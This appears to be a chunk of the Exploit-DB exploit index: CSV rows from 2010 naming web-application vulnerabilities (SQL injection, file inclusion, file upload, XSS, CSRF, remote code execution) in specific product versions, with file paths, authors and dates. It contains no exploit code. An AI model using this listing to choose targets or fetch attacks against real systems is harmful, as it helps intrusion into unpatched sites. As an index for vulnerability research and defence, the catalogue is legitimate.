+12318,exploits/php/webapps/12318.txt,"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion",2010-04-21,AntiSecurity,webapps,php, +12319,exploits/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",webapps,php, +12322,exploits/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,webapps,php, +12323,exploits/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,webapps,php, +12325,exploits/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,webapps,php, +12329,exploits/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,webapps,asp, +12330,exploits/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",webapps,php, +12333,exploits/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,webapps,php, +12338,exploits/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",webapps,php, +12339,exploits/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",webapps,php, +12345,exploits/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,webapps,php, +12346,exploits/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injections",2010-04-22,v3n0m,webapps,php, +12349,exploits/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,webapps,php, +12350,exploits/php/webapps/12350.txt,"In-portal 5.0.3 - Arbitrary File Upload",2010-04-23,eidelweiss,webapps,php, +12351,exploits/php/webapps/12351.txt,"memorial Web site script - 'id' SQL Injection",2010-04-23,v3n0m,webapps,php, +12353,exploits/php/webapps/12353.txt,"EPay Enterprise 4.13 - 'cid' SQL Injection",2010-04-23,v3n0m,webapps,php, +12354,exploits/php/webapps/12354.pl,"NKINFOWEB - SQL Injection",2010-04-23,d4rk-h4ck3r,webapps,php, +12355,exploits/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX & Cr3W-DZ",webapps,php, +12358,exploits/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password / Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",webapps,php, +12359,exploits/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete Vulnerabilities",2010-04-23,"Chip d3 bi0s",webapps,php, +12360,exploits/php/webapps/12360.pl,"Template Seller Pro 3.25 - 'tempid' SQL Injection",2010-04-23,v3n0m,webapps,php, +12361,exploits/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",webapps,php, +12364,exploits/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,cr4wl3r,webapps,php, +12365,exploits/php/webapps/12365.txt,"Openplanning 1.00 - Local File Inclusion / Remote File Inclusion",2010-04-24,cr4wl3r,webapps,php, +12366,exploits/php/webapps/12366.txt,"Openfoncier 2.00 - Local File Inclusion / Remote File Inclusion",2010-04-24,cr4wl3r,webapps,php, +12369,exploits/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion",2010-04-24,eidelweiss,webapps,php, +12370,exploits/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,webapps,php, +12371,exploits/php/webapps/12371.txt,"WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",webapps,php, +12372,exploits/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' SQL Injection",2010-04-24,v3n0m,webapps,php, +12373,exploits/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,webapps,php, +12374,exploits/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,webapps,php, +12376,exploits/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,webapps,php, +12378,exploits/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,webapps,php, +12381,exploits/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload",2010-04-25,eidelweiss,webapps,php, +12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,webapps,php, +12384,exploits/php/webapps/12384.txt,"Powered by iNetScripts - Arbitrary File Upload",2010-04-25,Sec-q8,webapps,php, +12385,exploits/php/webapps/12385.html,"TR Forum 1.5 - Cross-Site Request Forgery (Add Admin)",2010-04-25,EL-KAHINA,webapps,php, +12386,exploits/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump",2010-04-25,indoushka,webapps,php, +12387,exploits/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,webapps,php, +12395,exploits/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - Cross-Site Scripting / Authentication Bypass",2010-04-26,Sid3^effects,webapps,php, +12396,exploits/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,webapps,php, +12398,exploits/php/webapps/12398.txt,"Opencourrier 2.03beta - Local File Inclusion / Remote File Inclusion",2010-04-26,cr4wl3r,webapps,php, +12399,exploits/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' 'view' SQL Injection",2010-04-26,41.w4r10r,webapps,php, +12400,exploits/php/webapps/12400.txt,"Joomla! Component JoomRadio 1.0 - SQL Injection",2010-04-26,Mr.tro0oqy,webapps,php, +12402,exploits/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,webapps,php, +12407,exploits/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX & Cr3W-DZ",webapps,php, +12410,exploits/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,webapps,php, +12411,exploits/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,webapps,php, +12412,exploits/php/webapps/12412.txt,"Ramaas Software CMS - SQL Injection",2010-04-27,41.w4r10r,webapps,php, +12413,exploits/php/webapps/12413.txt,"i-Net Online Community - Cross-Site Scripting / Authentication Bypass",2010-04-27,Sid3^effects,webapps,php, +12414,exploits/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,webapps,php, +12415,exploits/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script - Authentication Bypass",2010-04-27,Sid3^effects,webapps,php, +12416,exploits/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilities",2010-04-27,ITSecTeam,webapps,php, +12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php, +12420,exploits/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Arbitrary File Upload",2010-04-27,eidelweiss,webapps,php, +12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,webapps,php, +12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php, +12424,exploits/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,webapps,asp, +12426,exploits/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion",2010-04-27,AntiSecurity,webapps,php, +12427,exploits/php/webapps/12427.txt,"Joomla! Component NoticeBoard 1.3 - Local File Inclusion",2010-04-27,AntiSecurity,webapps,php, +12428,exploits/php/webapps/12428.txt,"Joomla! Component SmartSite 1.0.0 - Local File Inclusion",2010-04-27,AntiSecurity,webapps,php, +12429,exploits/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,webapps,php, +12430,exploits/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",webapps,php, +12432,exploits/php/webapps/12432.txt,"Joomla! Component com_jesectionfinder - Arbitrary File Upload",2010-04-28,Sid3^effects,webapps,php, +12433,exploits/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",webapps,cgi, +12434,exploits/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",webapps,cgi, +12435,exploits/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",webapps,php, +12436,exploits/php/webapps/12436.txt,"Pligg CMS 1.0.4 - 'story.php' SQL Injection",2010-04-28,"Don Tukulesto",webapps,php, +12438,exploits/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,webapps,php, +12439,exploits/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,webapps,php, +12440,exploits/php/webapps/12440.txt,"Joomla! Component Wap4Joomla - 'wapmain.php' SQL Injection",2010-04-28,Manas58,webapps,php, +12441,exploits/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery (Add Admin)",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",webapps,php, +12442,exploits/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,webapps,php, +12443,exploits/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,webapps,php, +12444,exploits/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,webapps,php, +12445,exploits/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,webapps,php, +12446,exploits/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,webapps,php, +12447,exploits/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,webapps,php, +12448,exploits/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,webapps,php, +12449,exploits/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,webapps,php, +12450,exploits/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",webapps,windows, +12451,exploits/php/webapps/12451.txt,"iScripts VisualCaster - SQL Injection",2010-04-29,Sid3^effects,webapps,php, +12452,exploits/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection",2010-04-29,"Justin C. Klein Keane",webapps,php, +12453,exploits/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass",2010-04-29,indoushka,webapps,php, +12454,exploits/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,webapps,php, +12455,exploits/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,webapps,php, +12456,exploits/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,webapps,php, +12458,exploits/php/webapps/12458.txt,"Scratcher - SQL Injection / Cross-Site Scripting",2010-04-29,cr4wl3r,webapps,php, +12459,exploits/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,webapps,php, +12460,exploits/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,webapps,php, +12461,exploits/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,webapps,php, +12462,exploits/php/webapps/12462.txt,"AutoDealer 1.0/2.0 - MSSQL Injection",2010-04-30,Sid3^effects,webapps,php, +12463,exploits/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",webapps,php, +12464,exploits/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",webapps,asp, +12465,exploits/php/webapps/12465.txt,"Joomla! Component Newsfeeds - SQL Injection",2010-04-30,Archimonde,webapps,php, +12466,exploits/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,webapps,php, +12467,exploits/php/webapps/12467.txt,"Webthaiapp - 'detail.php?cat' Blind SQL Injection",2010-04-30,Xelenonz,webapps,php, +12468,exploits/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,webapps,php, +12471,exploits/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,webapps,asp, +12472,exploits/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,webapps,php, +12473,exploits/php/webapps/12473.txt,"Joomla! Component Table JX - Cross-Site Scripting",2010-05-01,Valentin,webapps,php, +12474,exploits/php/webapps/12474.txt,"Joomla! Component Card View JX - Cross-Site Scripting",2010-05-01,Valentin,webapps,php, +12475,exploits/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,webapps,php, +12476,exploits/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusions",2010-05-01,cr4wl3r,webapps,php, +12478,exploits/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,webapps,asp, +12479,exploits/php/webapps/12479.txt,"Joomla! Component com_djClassifieds 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,webapps,php, +12481,exploits/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",webapps,php, +12484,exploits/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,webapps,php, +12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php, +12486,exploits/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - Local File Inclusion / Remote File Inclusion",2010-05-02,cr4wl3r,webapps,php, +12488,exploits/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,cr4wl3r,webapps,php, +12489,exploits/php/webapps/12489.txt,"Joomla! 1.6.0 Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,webapps,php, +14025,exploits/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,webapps,php, +12496,exploits/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,webapps,php, +12499,exploits/php/webapps/12499.txt,"DBHcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,webapps,php, +12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php, +12504,exploits/php/webapps/12504.txt,"thEngine 0.1 - Local File Inclusion",2010-05-04,team_elite,webapps,php, +12506,exploits/php/webapps/12506.php,"Knowledgeroot (fckeditor) - Arbitrary File Upload",2010-05-04,eidelweiss,webapps,php, +12507,exploits/php/webapps/12507.txt,"SmartCMS 2 - SQL Injection",2010-05-04,Ariko-Security,webapps,php, +12510,exploits/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",webapps,php, +12514,exploits/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,webapps,php, +12515,exploits/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",webapps,php, +12517,exploits/php/webapps/12517.txt,"Getsimple 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php, +12519,exploits/php/webapps/12519.txt,"AV Arcade - 'Search' Cross-Site Scripting / HTML Injection",2010-05-06,"Vadim Toptunov",webapps,php, +12520,exploits/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",webapps,php, +12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php, +12522,exploits/php/webapps/12522.txt,"WeBProdZ CMS - SQL Injection",2010-05-06,MasterGipy,webapps,php, +12523,exploits/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution",2010-05-06,"JosS & eidelweiss",webapps,php, +12525,exploits/php/webapps/12525.txt,"PHP-Nuke - 'friend.php' Module SQL Injection",2010-05-07,CMD,webapps,php, +12526,exploits/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,webapps,asp, +12532,exploits/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,webapps,php, +12533,exploits/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,webapps,php, +12534,exploits/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL Redirection",2010-05-08,ITSecTeam,webapps,php, +12535,exploits/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",webapps,php, +12539,exploits/php/webapps/12539.txt,"Joomla! Component Article Factory Manager - Arbitrary File Upload",2010-05-08,Sid3^effects,webapps,php, +12542,exploits/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",webapps,php, +12543,exploits/php/webapps/12543.rb,"Alibaba Clone 3.0 (Special) - SQL Injection",2010-05-09,"Easy Laster",webapps,php, +12544,exploits/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection",2010-05-09,"Easy Laster",webapps,php, +12545,exploits/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection",2010-05-09,"Easy Laster",webapps,php, +12547,exploits/php/webapps/12547.txt,"e-webtech - 'new.asp?id=' SQL Injection",2010-05-10,protocol,webapps,php, +12550,exploits/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,webapps,php, +12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php, +12552,exploits/php/webapps/12552.txt,"tekno.Portal 0.1b - 'makale.php?id' SQL Injection",2010-05-10,CoBRa_21,webapps,php, +12553,exploits/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,webapps,php, +12556,exploits/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",webapps,php, +12557,exploits/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",webapps,php, +12558,exploits/php/webapps/12558.txt,"29o3 CMS - 'LibDir' Multiple Remote File Inclusions",2010-05-10,eidelweiss,webapps,php, +12560,exploits/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,webapps,php, +12561,exploits/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,webapps,php, +12562,exploits/php/webapps/12562.txt,"Waibrasil - Local/Remote File Inclusion",2010-05-10,eXeSoul,webapps,php, +12563,exploits/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,webapps,php, +12565,exploits/php/webapps/12565.txt,"724CMS Enterprise 4.59 - 'section.php' Local File Inclusion",2010-05-11,CoBRa_21,webapps,php, +12566,exploits/php/webapps/12566.txt,"724CMS Enterprise 4.59 - 'section.php' SQL Injection",2010-05-11,CoBRa_21,webapps,php, +12567,exploits/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,webapps,php, +12568,exploits/php/webapps/12568.txt,"Digital College 1.0 - Arbitrary File Upload",2010-05-11,indoushka,webapps,php, +12569,exploits/php/webapps/12569.html,"Fast Free Media 1.3 Adult Site - Arbitrary File Upload",2010-05-11,indoushka,webapps,php, +12570,exploits/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,webapps,php, +12571,exploits/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,webapps,asp, +12572,exploits/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,webapps,php, +12574,exploits/php/webapps/12574.txt,"Joomla! Component mod_VisitorData 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",webapps,php, +12575,exploits/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,webapps,php, +12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php, +12577,exploits/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,webapps,php, +12579,exploits/php/webapps/12579.txt,"Joomla! Component com_PHP 0.1 - Local File Inclusion",2010-05-12,"Chip d3 bi0s",webapps,php, +12583,exploits/php/webapps/12583.txt,"e-webtech - 'fixed_page.asp' SQL Injection",2010-05-12,FL0RiX,webapps,php, +12584,exploits/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,webapps,php, +12585,exploits/php/webapps/12585.txt,"4Images 1.7.7 - 'image_utils.php' Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",webapps,php, +12586,exploits/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,webapps,php, +12590,exploits/php/webapps/12590.txt,"Joomla! Component Komento 1.0.0 - 'sid' SQL Injection",2010-05-13,c4uR,webapps,php, +12591,exploits/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",webapps,php, +12592,exploits/php/webapps/12592.txt,"Joomla! Component aardvertiser 2.0 - Local File Inclusion",2010-05-13,eidelweiss,webapps,php, +12593,exploits/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",webapps,php, +12594,exploits/php/webapps/12594.txt,"Joomla! Component com_sebercart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,webapps,php, +12595,exploits/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",webapps,php, +12596,exploits/php/webapps/12596.txt,"Link Bid Script - 'links.php' SQL Injection",2010-05-14,R3d-D3V!L,webapps,php, +12597,exploits/php/webapps/12597.txt,"Press Release Script - 'page.php?id' SQL Injection",2010-05-14,R3d-D3V!L,webapps,php, +12598,exploits/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,webapps,php, +12599,exploits/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,webapps,php, +14364,exploits/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,webapps,php, +12601,exploits/php/webapps/12601.txt,"Joomla! Component JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,webapps,php, +12606,exploits/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,webapps,asp, +12607,exploits/php/webapps/12607.txt,"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion",2010-05-14,ALTBTA,webapps,php, +12608,exploits/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - 'photogallery_open.php' SQL Injection",2010-05-14,CoBRa_21,webapps,php, +12609,exploits/php/webapps/12609.txt,"Alibaba Clone Platinum - '/buyer/index.php' SQL Injection",2010-05-14,GuN,webapps,php, +12610,exploits/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",webapps,multiple, +12611,exploits/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,webapps,php, +12612,exploits/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,webapps,php, +12613,exploits/php/webapps/12613.txt,"CompactCMS 1.4.0 - 'tiny_mce' Arbitrary File Upload",2010-05-15,ITSecTeam,webapps,php, +12615,exploits/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",webapps,php, +12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php, +12618,exploits/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,webapps,php, +12619,exploits/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,webapps,php, +12620,exploits/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,webapps,php, +12623,exploits/php/webapps/12623.txt,"Joomla! Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,webapps,php, +12624,exploits/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",webapps,php, +12628,exploits/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,webapps,php, +12629,exploits/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,webapps,php, +12630,exploits/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,webapps,php, +12631,exploits/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,webapps,php, +12632,exploits/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,webapps,php, +12633,exploits/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,ALTBTA,webapps,php, +12634,exploits/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,webapps,php, +12635,exploits/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,webapps,php, +12636,exploits/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,webapps,php, +12637,exploits/php/webapps/12637.txt,"MyNews CMS 1.0 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,webapps,php, +12639,exploits/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,webapps,php, +12640,exploits/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",webapps,windows, +12641,exploits/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,webapps,php, +12642,exploits/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,cp77fk4r,webapps,php, +12643,exploits/php/webapps/12643.pl,"ChillyCMS - Blind SQL Injection",2010-05-18,IHTeam,webapps,php, +12644,exploits/php/webapps/12644.txt,"WebJaxe - SQL Injection",2010-05-18,IHTeam,webapps,php, +12645,exploits/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,webapps,php, +12646,exploits/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld & h00die",webapps,php, +12647,exploits/php/webapps/12647.txt,"Webloader 7 < 8 - 'vid' SQL Injection",2010-05-18,ByEge,webapps,php, +12648,exploits/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",webapps,php, +12651,exploits/php/webapps/12651.txt,"Lokomedia CMS - 'sukaCMS' Local File Disclosure",2010-05-18,vir0e5,webapps,php, +12654,exploits/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,webapps,php, +12656,exploits/php/webapps/12656.txt,"Battle Scrypt - Arbitrary File Upload",2010-05-19,DigitALL,webapps,php, +12658,exploits/freebsd/webapps/12658.txt,"McAfee Email Gateway - Web Administration Broken Access Control",2010-05-19,"Nahuel Grisolia",webapps,freebsd, +12659,exploits/php/webapps/12659.txt,"DB[CMS] - 'section.php' SQL Injection",2010-05-19,CoBRa_21,webapps,php, +12660,exploits/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting",2010-05-19,"Jeromie Jackson",webapps,hardware, 